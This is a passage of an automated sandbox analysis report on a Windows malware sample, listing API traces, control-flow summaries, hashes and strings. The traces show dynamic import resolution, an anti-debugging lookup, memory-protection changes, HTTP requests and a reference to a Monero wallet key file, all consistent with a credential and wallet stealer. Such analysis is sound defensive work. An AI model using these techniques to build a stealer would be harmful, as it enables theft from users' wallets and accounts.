                          • LoadLibraryA.KERNEL32(012806C0,?,00416A00), ref: 00419ACF
                          • LoadLibraryA.KERNEL32(01280768,?,00416A00), ref: 00419AE0
                          • GetProcAddress.KERNEL32(75070000,01280738), ref: 00419B02
                          • GetProcAddress.KERNEL32(75FD0000,012807C8), ref: 00419B23
                          • GetProcAddress.KERNEL32(75FD0000,01288D90), ref: 00419B3B
                          • GetProcAddress.KERNEL32(75A50000,01288EB0), ref: 00419B5D
                          • GetProcAddress.KERNEL32(74E50000,01276700), ref: 00419B7E
                          • GetProcAddress.KERNEL32(76E80000,012887F0), ref: 00419B9F
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00419BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                          • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                          • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                          • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 4045c0-404695 RtlAllocateHeap 781 4046a0-4046a6 764->781 782 4046ac-40474a 781->782 783 40474f-4047a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: e0e919c0a181e3e4761569682b6ef3db093da5a8f22fe90550f4713ada199f9e
                          • Instruction ID: 22ed7a58571918d810edc57e10ddec68df788e9c23d2e020e164f13485651267
                          • Opcode Fuzzy Hash: e0e919c0a181e3e4761569682b6ef3db093da5a8f22fe90550f4713ada199f9e
                          • Instruction Fuzzy Hash: 534109607C5A1C7AC634B7A4A8CEFBF76775F4A700FA25046E80852292CBF865144D3B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 816 404944 801->816 817 40494b-40494f 801->817 816->817 818 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 817->818 819 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 817->819 818->819 905 404ad3-404ad7 818->905 829 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 819->829 830 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 819->830 830->829 906 404ae5 905->906 907 404ad9-404ae3 905->907 908 404aef-404b22 HttpOpenRequestA 906->908 907->908 909 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlen call 41aad0 * 2 lstrlen call 41aad0 HttpSendRequestA 908->909 910 404ebe-404ec5 InternetCloseHandle 908->910 1021 404e32-404e5c InternetReadFile 909->1021 910->819 1022 404e67-404eb9 InternetCloseHandle call 41a800 1021->1022 1023 404e5e-404e65 1021->1023 1022->910 1023->1022 1025 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 1023->1025 1025->1021
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 0040493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0128E530), ref: 00404DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                          • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                          • HttpOpenRequestA.WININET(00000000,0128E5C0,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00404B15
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: a77be31ba9bf1b8b80f4c82e090011943913d2fdc8a5aa566b93f09babfa9efe
                          • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                          • Opcode Fuzzy Hash: a77be31ba9bf1b8b80f4c82e090011943913d2fdc8a5aa566b93f09babfa9efe
                          • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                          • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                          • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                          • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                          • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                          • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                          • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                          Control-flow Graph (legend: Executed / Not Executed; graph image not preserved)
                          Graph root 00419C10, covering 00419C10-0041A709: a chain of blocks resolving imports via GetProcAddress (43 calls in the first block, then 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1 and 4 in later blocks) with LoadLibraryA * 8 at 0041A036-0041A0CA.
                          APIs
                          • GetProcAddress.KERNEL32(75900000,01276920), ref: 00419C2D
                          • GetProcAddress.KERNEL32(75900000,01276A20), ref: 00419C45
                          • GetProcAddress.KERNEL32(75900000,01288F70), ref: 00419C5E
                          • GetProcAddress.KERNEL32(75900000,01288F58), ref: 00419C76
                          • GetProcAddress.KERNEL32(75900000,0128CF18), ref: 00419C8E
                          • GetProcAddress.KERNEL32(75900000,0128CF90), ref: 00419CA7
                          • GetProcAddress.KERNEL32(75900000,0127AF28), ref: 00419CBF
                          • GetProcAddress.KERNEL32(75900000,0128CE28), ref: 00419CD7
                          • GetProcAddress.KERNEL32(75900000,0128CF30), ref: 00419CF0
                          • GetProcAddress.KERNEL32(75900000,0128CE40), ref: 00419D08
                          • GetProcAddress.KERNEL32(75900000,0128CF48), ref: 00419D20
                          • GetProcAddress.KERNEL32(75900000,012766A0), ref: 00419D39
                          • GetProcAddress.KERNEL32(75900000,01276780), ref: 00419D51
                          • GetProcAddress.KERNEL32(75900000,01276800), ref: 00419D69
                          • GetProcAddress.KERNEL32(75900000,01276820), ref: 00419D82
                          • GetProcAddress.KERNEL32(75900000,0128CED0), ref: 00419D9A
                          • GetProcAddress.KERNEL32(75900000,0128CFA8), ref: 00419DB2
                          • GetProcAddress.KERNEL32(75900000,0127AED8), ref: 00419DCB
                          • GetProcAddress.KERNEL32(75900000,012769A0), ref: 00419DE3
                          • GetProcAddress.KERNEL32(75900000,0128CF60), ref: 00419DFB
                          • GetProcAddress.KERNEL32(75900000,0128CEB8), ref: 00419E14
                          • GetProcAddress.KERNEL32(75900000,0128CE88), ref: 00419E2C
                          • GetProcAddress.KERNEL32(75900000,0128CF78), ref: 00419E44
                          • GetProcAddress.KERNEL32(75900000,01276940), ref: 00419E5D
                          • GetProcAddress.KERNEL32(75900000,0128CFC0), ref: 00419E75
                          • GetProcAddress.KERNEL32(75900000,0128CE58), ref: 00419E8D
                          • GetProcAddress.KERNEL32(75900000,0128CE10), ref: 00419EA6
                          • GetProcAddress.KERNEL32(75900000,0128CE70), ref: 00419EBE
                          • GetProcAddress.KERNEL32(75900000,0128CEA0), ref: 00419ED6
                          • GetProcAddress.KERNEL32(75900000,0128CEE8), ref: 00419EEF
                          • GetProcAddress.KERNEL32(75900000,0128CF00), ref: 00419F07
                          • GetProcAddress.KERNEL32(75900000,0128C8E8), ref: 00419F1F
                          • GetProcAddress.KERNEL32(75900000,0128C810), ref: 00419F38
                          • GetProcAddress.KERNEL32(75900000,01289DB8), ref: 00419F50
                          • GetProcAddress.KERNEL32(75900000,0128C888), ref: 00419F68
                          • GetProcAddress.KERNEL32(75900000,0128C870), ref: 00419F81
                          • GetProcAddress.KERNEL32(75900000,01276960), ref: 00419F99
                          • GetProcAddress.KERNEL32(75900000,0128C960), ref: 00419FB1
                          • GetProcAddress.KERNEL32(75900000,01276880), ref: 00419FCA
                          • GetProcAddress.KERNEL32(75900000,0128C978), ref: 00419FE2
                          • GetProcAddress.KERNEL32(75900000,0128C990), ref: 00419FFA
                          • GetProcAddress.KERNEL32(75900000,01276600), ref: 0041A013
                          • GetProcAddress.KERNEL32(75900000,01276480), ref: 0041A02B
                          • LoadLibraryA.KERNEL32(0128C840,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A03D
                          • LoadLibraryA.KERNEL32(0128CA08,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A04E
                          • LoadLibraryA.KERNEL32(0128CAB0,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A060
                          • LoadLibraryA.KERNEL32(0128CAC8,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A072
                          • LoadLibraryA.KERNEL32(0128C9A8,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A083
                          • LoadLibraryA.KERNEL32(0128C9C0,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A095
                          • LoadLibraryA.KERNEL32(0128CAE0,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A0A7
                          • LoadLibraryA.KERNEL32(0128C858,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A0B8
                          • GetProcAddress.KERNEL32(75FD0000,01276280), ref: 0041A0DA
                          • GetProcAddress.KERNEL32(75FD0000,0128C9D8), ref: 0041A0F2
                          • GetProcAddress.KERNEL32(75FD0000,01288970), ref: 0041A10A
                          • GetProcAddress.KERNEL32(75FD0000,0128C8A0), ref: 0041A123
                          • GetProcAddress.KERNEL32(75FD0000,012764E0), ref: 0041A13B
                          • GetProcAddress.KERNEL32(6FCE0000,0127AF78), ref: 0041A160
                          • GetProcAddress.KERNEL32(6FCE0000,01276380), ref: 0041A179
                          • GetProcAddress.KERNEL32(6FCE0000,0127B338), ref: 0041A191
                          • GetProcAddress.KERNEL32(6FCE0000,0128C8D0), ref: 0041A1A9
                          • GetProcAddress.KERNEL32(6FCE0000,0128C918), ref: 0041A1C2
                          • GetProcAddress.KERNEL32(6FCE0000,012763C0), ref: 0041A1DA
                          • GetProcAddress.KERNEL32(6FCE0000,012762A0), ref: 0041A1F2
                          • GetProcAddress.KERNEL32(6FCE0000,0128C8B8), ref: 0041A20B
                          • GetProcAddress.KERNEL32(763B0000,012763A0), ref: 0041A22C
                          • GetProcAddress.KERNEL32(763B0000,012762E0), ref: 0041A244
                          • GetProcAddress.KERNEL32(763B0000,0128C900), ref: 0041A25D
                          • GetProcAddress.KERNEL32(763B0000,0128C930), ref: 0041A275
                          • GetProcAddress.KERNEL32(763B0000,012764A0), ref: 0041A28D
                          • GetProcAddress.KERNEL32(750F0000,0127AFA0), ref: 0041A2B3
                          • GetProcAddress.KERNEL32(750F0000,0127B2E8), ref: 0041A2CB
                          • GetProcAddress.KERNEL32(750F0000,0128C948), ref: 0041A2E3
                          • GetProcAddress.KERNEL32(750F0000,012763E0), ref: 0041A2FC
                          • GetProcAddress.KERNEL32(750F0000,01276500), ref: 0041A314
                          • GetProcAddress.KERNEL32(750F0000,0127B270), ref: 0041A32C
                          • GetProcAddress.KERNEL32(75A50000,0128C828), ref: 0041A352
                          • GetProcAddress.KERNEL32(75A50000,01276560), ref: 0041A36A
                          • GetProcAddress.KERNEL32(75A50000,01288910), ref: 0041A382
                          • GetProcAddress.KERNEL32(75A50000,0128CA38), ref: 0041A39B
                          • GetProcAddress.KERNEL32(75A50000,0128CA50), ref: 0041A3B3
                          • GetProcAddress.KERNEL32(75A50000,012765C0), ref: 0041A3CB
                          • GetProcAddress.KERNEL32(75A50000,01276420), ref: 0041A3E4
                          • GetProcAddress.KERNEL32(75A50000,0128C9F0), ref: 0041A3FC
                          • GetProcAddress.KERNEL32(75A50000,0128CA20), ref: 0041A414
                          • GetProcAddress.KERNEL32(75070000,01276300), ref: 0041A436
                          • GetProcAddress.KERNEL32(75070000,0128CA68), ref: 0041A44E
                          • GetProcAddress.KERNEL32(75070000,0128CA80), ref: 0041A466
